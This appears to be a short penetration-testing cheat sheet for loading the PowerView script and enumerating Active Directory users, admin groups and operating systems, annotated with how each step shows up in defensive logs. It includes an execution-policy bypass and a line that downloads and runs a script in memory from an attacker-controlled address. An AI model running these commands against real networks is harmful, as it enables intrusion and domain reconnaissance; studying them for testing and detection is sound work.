PowerView.ps1
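# -ep bypasses the execution policy of powershell allowing you to easily run scripts
# (execution policy is a safety setting, not a security boundary: script block
# logging, AMSI and application control such as WDAC/AppLocker still apply to
# a session started this way)
powershell -ep bypass

# download it from attacker
# (the script is fetched over plain HTTP and handed straight to iex, so it is
# loaded into the session without being saved to disk; the request shows up in
# proxy / network logs and the script body in script block logging, event ID 4104)
iex(new-object net.webclient).downloadstring('http://10.10.14.4:9090/PowerView.ps1')

# launch it
# (dot-sourcing loads the functions from a copy on disk into the current session)
. .\Downloads\PowerView.ps1

# The three queries below are LDAP reads made with the current user's domain
# account; on the defensive side they appear as LDAP search activity from the
# workstation towards a domain controller.

# Enumerate domain users
Get-NetUser | select cn

# Enumerate domain groups :
Get-NetGroup -GroupName *admin*

# Enumerate domain OS :
Get-NetComputer -fulldata | select operatingsystem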